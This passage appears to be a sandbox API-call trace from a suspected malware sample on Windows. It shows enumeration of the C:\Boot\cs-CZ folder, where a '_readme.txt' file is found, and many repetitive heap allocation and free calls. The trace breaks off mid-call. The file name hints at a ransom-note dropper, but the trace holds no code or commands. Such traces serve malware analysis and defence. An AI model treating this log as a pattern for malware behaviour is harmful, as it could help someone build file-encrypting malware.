[0142.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.678] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a42750, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a42750, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.679] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8a42750, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a42750, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.679] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.679] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a42750, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a42750, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a42750, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.679] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a42750, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a42750, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a42750, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.679] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.679] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1cf8 | out: hHeap=0x620000) returned 1 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 